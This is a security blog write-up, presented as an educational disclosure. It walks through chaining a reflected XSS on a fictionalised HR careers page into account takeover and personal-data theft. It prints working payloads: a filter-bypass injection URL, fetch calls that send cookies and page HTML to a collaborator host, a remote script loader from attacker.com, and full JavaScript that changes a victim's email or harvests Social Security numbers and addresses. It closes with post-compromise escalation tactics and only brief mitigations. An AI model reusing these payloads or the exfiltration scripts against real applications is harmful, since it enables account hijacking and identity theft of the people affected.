XSS to Account Takeover & Data Exfiltration
Introduction
Cross-Site Scripting (XSS) vulnerabilities continue to plague web applications despite being well-understood for decades. While they might seem simple on the surface, the impact of XSS can be devastating when chained with other attack techniques.
In this article, I'll walk through a real-world example of how a seemingly innocent XSS vulnerability was leveraged to achieve full account takeover and sensitive data exfiltration. We'll explore the complete attack chain - from initial discovery to exploitation - demonstrating how attackers can pivot from a basic reflected XSS to stealing Social Security Numbers, personal information, and ultimately taking control of user accounts.
The beauty of this attack chain lies in its simplicity and effectiveness. By finding an unprotected endpoint with XSS, then combining it with session riding techniques, we were able to bypass modern browser protections and achieve multiple high-impact objectives with minimal effort.
Important Disclaimer !
All company names, domains, URLs, and personal data presented in this article are entirely fictional.
While the attack methodology and techniques described are based on a real-world security assessment, all identifying details have been completely changed to protect confidentiality. The vulnerabilities described have since been remediated by the affected organization. This article is published for educational purposes only.
Prerequisites
- A web proxy for intercepting/modifying requests (like Burp Suite)
- Basic knowledge of Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF)
1. Discovering the Vulnerability
The first step in any security assessment is thorough reconnaissance. Using directory brute forcing tools like dirb or gobuster can often reveal hidden endpoints that aren't linked from the main application interface.
$ dirb https://crosssitecorp.com /usr/share/wordlists/dirb/common.txt
During our assessment, we discovered an interesting endpoint at /HR/Career.aspx that accepted a Client parameter and several other query parameters. This caught our attention because:
- It wasn't linked from the main application
- It accepted multiple user-controlled parameters
We decided to test for XSS by injecting a simple payload into one of the parameters. During our testing, we discovered some filtering mechanisms were in place:
- Using the equals sign (
=) in our payload resulted in HTTP 500 errors - Single quotes (
') were being filtered out of our input - Some standard XSS payloads were blocked by the application
Through trial and error, we found a payload pattern that bypassed these filters:
https://crosssitecorp.com/HR/Career.aspx?Client=COMPANY123&xxFxx"><script>alert(1)</script>jifk0=1
To our surprise, the application reflected our payload directly into the page's HTML without proper sanitization:
<meta http-equiv="X-UA-Compatible" content="IE=9" />
<link rel='Icon' href='/images/logo.png' />
<meta property="og:url" content="https://crosssitecorp.com/HR/Career.aspx?Client=COMPANY123&xxFxx"><script>alert(1)</script>jifk0=1" /><meta property="og:title" content="Cross Site Corp Careers" /><meta property="og:description" content="Cross Site Corp Careers" />
The alert box popped, confirming we had found a viable XSS vulnerability despite the partial filtering. But how severe was it? Could we leverage it to do something more impactful than just displaying an alert box?
2. Assessing the Impact
With XSS confirmed, we needed to evaluate what we could access within the context of the vulnerable page. Our first thought was to try to extract cookies that might contain session information.
To capture the exfiltrated data, we set up a Burp Collaborator client, which provides a unique subdomain (in our case, "k8tzf2dpSOMEBURPCOLLABURL5ku.oastify.com") that can capture HTTP/DNS interactions. This allowed us to collect data without setting up a separate server infrastructure.
// Attempt to extract cookies
fetch("https://k8tzf2dpSOMEBURPCOLLABURL5ku.oastify.com/" + document.cookie)
We crafted the following payload to send cookies to our collection server:
https://crosssitecorp.com/HR/Career.aspx?Client=COMPANY123&wd"><script>fetch("https://k8tzf2dpSOMEBURPCOLLABURL5ku.oastify.com/" + document.cookie)</script>jifk0=1
When the victim's browser executed our payload, Burp Collaborator captured the HTTP request containing the cookies:
GET /IsSessionActive=true;_ga=GA1.2.1809283711.1683748940;_gid=GA1.2.1672134812.1683748940;_fbp=fb.1.1683748940623.957356889 HTTP/1.1
Host: k8tzf2dpSOMEBURPCOLLABURL5ku.oastify.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Accept: */*
Upon examining the requests more closely in Burp Suite, we discovered that the authentication cookies were protected with the HttpOnly flag, preventing JavaScript from accessing them:
Set-Cookie: .AUTH=F2AD67B9FC03A2B9A802F24C8C32A5FB8; path=/; HttpOnly; Secure; SameSite=Lax
This meant we couldn't simply steal the authentication cookies via JavaScript. We needed a different approach.
3. Expanding Our Testing
Since direct cookie theft wasn't possible, we tried to extract the page's HTML content to see if there was any sensitive information or potential attack vectors. Again, we used our Burp Collaborator endpoint to capture the exfiltrated data:
https://crosssitecorp.com/HR/Career.aspx?Client=COMPANY123&wd"><script>fetch("https://k8tzf2dpSOMEBURPCOLLABURL5ku.oastify.com/dom?html=" + btoa(document.documentElement.innerHTML))</script>jifk0=1
Burp Collaborator captured the base64-encoded HTML of the page:
GET /dom?htmlPGhlYWQ+PGxpbmsgcmVsPSJzdHlsZXNoZWV0IiB0eXBlPSJ0ZXh0L2NzcyIgaHJlZj0iL0RYUi5heGQ/cj0xXzEyLDFfNSwxXzMtQTNvQnUiPjx0aXRsZT4KCUNyb3NzIFNpdGUgQ29ycCBDYXJlZXJzIEpvYiBPcGVuaW5ncwkKPC90aXRsZT48bWV0YSBuYW1lPSJ2aWV3cG9ydCIgY29udGVudD0id2lkdGg9ZGV2aWNlLXdpZHRoLCBpbml0aWFsLXNjYWxlPTEiPgogICAgICAgIDxtZXRhIGh0dHAtZXF1aXY9IlgtVUEtQ29tcGF0aWJsZSIgY29udGVudD0iSUU9OSI+CiAgICAgICAgPGxpbmsgcmVsPSJDb21wYW55IEljb24iIGhyZWY9Ii9pbWFnZXMvbG9nby5wbmciPgogICAgICAgIDxtZXRhIHByb3BlcnR5PSJvZzp1cmwiIGNvbnRlbnQ9Imh0dHBzOi8vY3Jvc3NzaXRlY29ycC5jb20vam9icy9jYXJlZXIuYXNweA... HTTP/1.1
Host: k8tzf2dpSOMEBURPCOLLABURL5ku.oastify.com
Accept: */*
The advantage of using Burp Collaborator is that it provides a complete log of all interactions, including headers and request parameters, which helped us analyze the exfiltrated data more effectively. It also doesn't require setting up a separate server infrastructure, making it an ideal tool for security assessments.
When decoded, the base64 data revealed the following HTML structure:
<head><link rel="stylesheet" type="text/css" href="/DXR.axd?r=1_12,1_5,1_3-A3oBu"><title>
Cross Site Corp Careers
</title><meta name="viewport" content="width=device-width, initial-scale=1">
<meta http-equiv="X-UA-Compatible" content="IE=9">
<link rel="Company Icon" href="/images/logo.png">
<meta property="og:url" content="https://crosssitecorp.com/HR/Career.aspx?Client=COMPANY123&wd"><script>fetch("https://k8tzf2dpSOMEBURPCOLLABURL5ku.oastify.com/dom?html="+btoa(document.documentElement.innerHTML))</script>jifk0=1">
<meta property="og:title" content="Cross Site Corp Careers">
<meta property="og:description" content="Cross Site Corp Careers">
</head>
This confirmed our injection point was in the meta tags within the document head, limiting our visibility of the full DOM structure.
4. Session Riding: The Key to Escalation
We realized that despite not being able to steal authentication cookies, we could still perform actions on behalf of the user through session riding (a form of CSRF - Cross-Site Request Forgery).
Understanding Session Riding
Session riding is particularly powerful in this context because:
- The victim's browser automatically includes their authenticated cookies with requests
- JavaScript running in the context of the vulnerable domain can make requests to any endpoint on that domain
- Modern CSRF protections often rely on tokens that our XSS can extract and reuse
- Same-Origin Policy allows our injected JavaScript to read responses from the target domain
The application had a user profile page at /Account.aspx where users could update their personal information, including email addresses. If we could change a user's email to one we controlled, we might be able to trigger a password reset and take over the account.
Analyzing the Form Structure
First, we needed to understand the request structure for updating a user's profile. We intercepted a legitimate profile update request with Burp Suite and found it was a multipart form POST request with numerous form fields:
POST /Account.aspx HTTP/1.1
Host: crosssitecorp.com
Cookie: [REDACTED]
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="__EVENTTARGET"
ctl00$Main$btnSave$btnPrimary
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="__EVENTARGUMENT"
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="__VIEWSTATE"
/wEPDwULLTE2MzM4NDg4MTgPZBYCZg9kFgICBA9kFgJmD2QWAgIBD2QWAmYPZBYCZg9kFg...
[TRUNCATED]
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="ctl00$Main$txtEmail$txtText"
victim@crosssitecorp.com
------WebKitFormBoundary7MA4YWxkTrZu0gW
[MANY MORE FORM FIELDS]
------WebKitFormBoundary7MA4YWxkTrZu0gW--
5. Crafting the Attack
The key insight was that we could use our XSS to load an external JavaScript file that would:
- Fetch the Account page to get the current form state with valid tokens
- Extract the form data
- Modify the email address
- Submit the form back to the server
HTTPS Requirement and Server Setup
During our testing, we encountered an important browser security feature: mixed content blocking. Since CrossSiteCorp's website used HTTPS, attempting to load our JavaScript from a regular HTTP server resulted in the browser blocking the request. This is a security feature in modern browsers that prevents secure HTTPS pages from loading insecure HTTP resources, which could be tampered with in transit.
We needed a quick and reliable way to serve our exploit over HTTPS. Setting up a traditional HTTPS server would typically require:
- Obtaining an SSL certificate from a Certificate Authority
- Configuring a web server like Apache or Nginx
- Setting up proper SSL/TLS settings
Instead, we opted for - Caddy Server, which provides automatic HTTPS with minimal configuration. Caddy automatically obtains and renews SSL certificates from Let's Encrypt, making it perfect for quickly setting up a secure endpoint for our exploit.
We created a JavaScript payload to host on our server (attacker.com/exploit.js):
;(async()=>{
// Fetch the account page to get valid form values
const html = await fetch("/Account/Account.aspx", {
credentials: "include" // Include cookies for authenticated request
}).then(r=>r.text());
// Parse the HTML response
const doc = new DOMParser().parseFromString(html,"text/html");
const form = doc.querySelector("form");
// Get the form's action URL
const base = `${window.location.origin}/Account/`;
const action = new URL(form.getAttribute("action"), base).href;
// Extract all form data (including CSRF tokens)
const data = new FormData(form);
// Set the target button that would normally be clicked
data.set("__EVENTTARGET", "ctl00$Main$btnSave$btnPrimary");
data.set("__EVENTARGUMENT", "");
// Change the email to one we control
data.set("ctl00$Main$txtEmail$txtText", "attacker@malicious.com");
// Submit the modified form
const res = await fetch(action, {
method: "POST",
credentials: "include",
body: data
});
console.log(res.ok ? "Profile updated successfully!" : "Failed to update profile", res.status);
})();
Now we needed to deliver this payload through our XSS vulnerability. A direct script tag wouldn't work well because our injection point was in the document head. Instead, we used an event listener to execute our code after the page had loaded:
https://crosssitecorp.com/HR/Career.aspx?Client=COMPANY123&wd"><script>addEventListener("load",Function("document.head.appendChild(Object.assign(document.createElement(\"script\"),{\"src\":\"https://attacker.com/exploit.js\"}))"));</script>jifk0=1
This payload:
- Injects a script tag into the page's head
- Adds an event listener for the "load" event
- When the page loads, creates a new script element pointing to our exploit.js file
- Appends the script to the document head, causing it to load and execute
6. Account Takeover: The Final Step
When a victim visited our specially crafted URL, their browser would execute our attack sequence:
Stage 1: Initial Execution
The victim loads the vulnerable Careers page with our malicious payload, and our injected script sets up a load event listener. When the page finishes loading, the listener executes, creating a new script element pointing to our hosted exploit.js, which is then loaded and executed in the context of crosssitecorp.com.
Stage 2: Profile Manipulation
The exploit script fetches the user's account page with their authenticated session and extracts the complete form structure including VIEWSTATE (ASP.NET's serialized page state), EVENTVALIDATION (validation hash for allowed form values), all form field values, and anti-CSRF tokens specific to the session. It then modifies only the email address field to one we control (attacker@malicious.com), constructs a multipart/form-data POST request with all original fields and tokens, and submits this request to the server, which validates all tokens and processes the change.
Stage 3: Account Takeover
With the email address changed in the system, we navigate to the login page, click "Forgot Password" and enter the victim's username. The system sends a password reset link to our attacker-controlled email. We receive the email, click the reset link, set a new password, and now have full access to the victim's account with valid credentials.
This attack is especially dangerous because it leaves minimal traces in logs (all requests come from the victim's IP and browser), bypasses multi-factor authentication tied to the login process, works even if the victim has an active session on another device, is difficult to detect since it uses legitimate application functionality, and the user won't be notified of suspicious access attempts, only of a completed email change.
From the victim's perspective, they simply clicked a link and continued browsing. Behind the scenes, our code executed silently, changed their email, and gave us control of their account. The victim might only realize something was wrong when they stopped receiving account-related emails or were unable to log in with their password.
Alternative Attack: Direct Data Exfiltration
While changing the email address for account takeover is one approach, we also explored direct exfiltration of sensitive user data. This approach is particularly effective when targeting multiple users simultaneously through a mass XSS campaign. Instead of manipulating the form, we can simply extract and exfiltrate the sensitive information already displayed on the user's account page.
We created an alternative payload focused on data exfiltration:
;(async()=>{
// 1) Fetch the real "Account" form
const url = `${window.location.origin}/Account/Account.aspx`;
const res = await fetch(url, { credentials: 'include' });
const html = await res.text();
// 2) Parse it
const doc = new DOMParser().parseFromString(html, 'text/html');
const form = doc.querySelector('form');
// 3) List the exact form-field names you really care about
const fields = [
'ctl00$Main$txtFirst$txtText', // First name
'ctl00$Main$txtMiddle$txtText', // Middle
'ctl00$Main$txtLast$txtText', // Last name
'ctl00$Main$txtEmployeeNumber', // Employee #
'ctl00$Main$txtSsn', // SSN
'ctl00$Main$txtDOB$txtDate', // DOB
'ctl00$Main$txtaddress1$txtText', // Address
'ctl00$Main$txtCity$txtText', // City
'ctl00$Main$cmbState$cmbSelection', // State
'ctl00$Main$txtZip$txtText', // ZIP
'ctl00$Main$txtPhone', // Home phone
'ctl00$Main$txtWorkPhone', // Work phone
'ctl00$Main$txtMobilePhone', // Mobile phone
'ctl00$Main$txtEmail$txtText', // Work email
'ctl00$Main$txtPersonalEmail$txtText' // Personal email
];
// 4) Slurp them out of a FormData blob
const fd = new FormData(form);
const data = {};
for (const name of fields) {
data[name.replace(/\W/g,'_')] = fd.get(name) || '';
}
// 5) b64-encode and beacon it off to your collaborator
const payload = btoa(JSON.stringify(data));
const img = new Image();
img.src = `https://k8tzf2dpSOMEBURPCOLLABURL5ku.oastify.com/collect?data=${encodeURIComponent(payload)}`;
document.documentElement.appendChild(img);
console.log('đĄ exfiltrated:', data);
})();
This script:
- Fetches the user's account page with their authenticated session
- Extracts specific sensitive form fields
- Encodes the data as base64
- Uses an image request to exfiltrate the data (which works even if fetch is blocked)
- Logs the exfiltrated data to the console for debugging
When deployed, this payload successfully exfiltrated sensitive user information. In our Burp Collaborator, we received:
GET /collect?data=ICAiY3RsMDBfTWFpbl90eHRGaXJzdF90eHRUZXh0IjogIk1pY2hhZWwiLAogICJjdGwwMF9NYWluX3R4dE1pZGRsZV90eHRUZXh0IjogIlJvYmVydCIsCiAgImN0bDAwX01haW5fdHh0TGFzdF90eHRUZXh0IjogIkpvaG5zb24iLAogICJjdGwwMF9NYWluX3R4dEVtcGxveWVlTnVtYmVyIjogIkVNUC00NTg5MiIsCiAgImN0bDAwX01haW5fdHh0U3NuIjogIjQyMS02OS04NzMyIiwKICAiY3RsMDBfTWFpbl90eHRET0JfdHh0RGF0ZSI6ICIwNC8xNy8xOTg1IiwKICAiY3RsMDBfTWFpbl90eHRhZGRyZXNzMV90eHRUZXh0IjogIjg3MjEgT2Frd29vZCBEcml2ZSwgQXBhcnRtZW50IDE1Q... HTTP/1.1
Host: k8tzf2dpSOMEBURPCOLLABURL5ku.oastify.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Referer: https://crosssitecorp.com/
When we decoded the base64 data, we found a wealth of sensitive information about the user:
{
"ctl00_Main_txtFirst_txtText": "Michael",
"ctl00_Main_txtMiddle_txtText": "Robert",
"ctl00_Main_txtLast_txtText": "Johnson",
"ctl00_Main_txtEmployeeNumber": "EMP-45892",
"ctl00_Main_txtSsn": "421-69-8732",
"ctl00_Main_txtDOB_txtDate": "04/17/1985",
"ctl00_Main_txtaddress1_txtText": "8721 Oakwood Drive, Apartment 15B",
"ctl00_Main_txtCity_txtText": "Arlington",
"ctl00_Main_cmbState_cmbSelection": "VA - Virginia",
"ctl00_Main_txtZip_txtText": "22201",
"ctl00_Main_txtPhone": "(703) 555-1842",
"ctl00_Main_txtWorkPhone": "(202) 555-9371",
"ctl00_Main_txtMobilePhone": "(703) 555-3914",
"ctl00_Main_txtEmail_txtText": "michael.johnson@crosssitecorp.com",
"ctl00_Main_txtPersonalEmail_txtText": "mike.johnson85@gmail.com"
}
This data represents a significant privacy breach, containing:
- Full name and date of birth
- Social Security Number
- Complete home address
- Multiple contact phone numbers
- Both work and personal email addresses
- Employee identification number
With this information, an attacker could:
- Conduct identity theft
- Target the user with highly convincing spear-phishing attacks
- Attempt to access other accounts using the personal information for password recovery
- Sell the data on underground markets
- Use the information for physical stalking or harassment
- Impersonate the employee within the organization
The most concerning aspect is that this attack can be deployed at scale. By finding a way to distribute the malicious URL (through targeted phishing, water-holing, or social engineering), an attacker could potentially exfiltrate data from hundreds or thousands of employees with minimal effort.
Variations of the Attack
The attack techniques described can be extended in several ways for even greater impact. Attackers might establish long-term control by adding secondary recovery emails or phone numbers rather than changing the primary email, creating a less detectable backdoor to accounts that victims might never notice. Data exfiltration can be expanded beyond basic profile information to corporate data, financial records, and even internal documents depending on the user's access level.
Once initial access is gained, attackers can use one account to send convincing internal communications to other employees, expanding the attack surface organically. Sophisticated attackers can maintain access while minimizing detection risk by making subtle changes to notification preferences or adding monitoring scripts, allowing them to observe user activities over extended periods without triggering security alerts.
7. Impact and Lessons Learned
This attack chain demonstrates how a seemingly low-impact XSS vulnerability can be escalated to complete account takeover when combined with:
- The ability to execute JavaScript in the victim's browser
- Knowledge of the application's form structure
- A clever approach to bypass anti-CSRF protections
- An understanding of how to manipulate the DOM
8. Mitigation Steps
Protecting against this type of attack chain requires implementing several complementary security measures. Properly encoding all user input when reflecting it in HTML responses forms the first line of defense against XSS vulnerabilities, preventing attackers from injecting malicious scripts.
A robust Content Security Policy header provides an additional layer of protection by restricting which domains can serve executable scripts to your application. A policy like default-src 'self'; script-src 'self' would effectively prevent loading external malicious scripts, blocking the attack chain we demonstrated.
Email change verification serves as a critical security checkpoint. By requiring verification from both the old and new email addresses before completing a change, applications can prevent unauthorized email modifications even if an attacker manages to bypass other protections.
9. XSS in Modern Social Engineering and Red Team Operations
The attack techniques described in this article have significant implications beyond individual account takeovers. In modern red team operations and advanced social engineering campaigns, XSS vulnerabilities serve as powerful initial access vectors that can be leveraged for sophisticated privilege escalation and lateral movement within an organization.
Privilege Escalation via XSS
One of the most valuable aspects of XSS in real-world red team operations is its ability to enable privilege escalation. Once we've compromised a low-privilege account using the techniques described above, we can leverage that account to target higher-privilege users within the organization. Using information gathered from the compromised low-level account (such as organizational charts, internal communications, or reporting structures), we can identify users with elevated privileges like department heads, IT administrators, or C-level executives. With knowledge of the internal system, we can craft more sophisticated payloads that specifically target administrative interfaces or internal tools that aren't accessible to regular users.
Social Engineering Enhancement
XSS significantly enhances social engineering efforts by exploiting trust relationships. Messages or links sent from a legitimate compromised account carry inherent trust - if a finance team member receives a link from a colleague they've worked with for years, they're much more likely to click it than a random external email. After compromising a low-level account, we gain visibility into ongoing projects, communication styles, and organizational norms, allowing us to craft highly convincing social engineering messages that reference real events, use appropriate terminology, and arrive at expected times.
In one real-world (anonymized) example, we compromised a junior HR staff account via the XSS vulnerability, used that access to study internal communications and identify the IT support workflow, crafted a convincing "password reset required" message to the IT administrator, and gained administrative credentials that provided access to sensitive company data.
Real-World Example: Sensitive Data Access Progression
In a sanitized example from a real engagement, we were able to demonstrate a concerning attack path: Initial compromise of a standard employee account through the XSS vulnerability, discovery of the company's internal ticketing system through the compromised account, identification of IT administrators who had recently helped other users, sending a targeted XSS link to an IT administrator through the internal messaging system, and compromise of the administrator account, providing access to user management systems, internal security configuration tools, customer data repositories, and financial information.
What made this attack particularly effective was that each step appeared legitimate to the victims. The XSS payload was delivered via trusted channels from known colleagues, making traditional security awareness training less effective as a defense.
Conclusion
The journey from a simple reflected XSS vulnerability to full account takeover and sensitive data extraction demonstrates the profound security risks that seemingly minor vulnerabilities can pose when skillfully exploited. Through this complete attack chain, we've seen how modern web applications remain vulnerable despite decades of security awareness around cross-site scripting.
What makes this exploitation path particularly concerning is not its technical sophisticationâwe used relatively simple JavaScript techniquesâbut rather its effectiveness at bypassing multiple layers of security controls that organizations typically rely on. The attack circumvented HttpOnly cookie protections, anti-CSRF measures, and even the natural suspicion users might have toward external communications.
The data exfiltration component reveals a critical privacy dimension often overlooked in XSS assessments. Beyond simply taking over accounts, attackers can silently harvest sensitive personal and corporate information that may have serious consequences for both individuals and organizations. The Social Security Numbers, home addresses, and contact details exposed in our testing represent just one category of sensitive data that might be compromised.
As web applications continue to evolve and grow more complex, we can expect attackers to discover new ways of chaining vulnerabilities together. By understanding these sophisticated attack paths and implementing appropriate defenses, organizations can better protect their users' sensitive data and maintain the trust that's essential to their digital operations.
Happy Hacking! (Ethically, of course)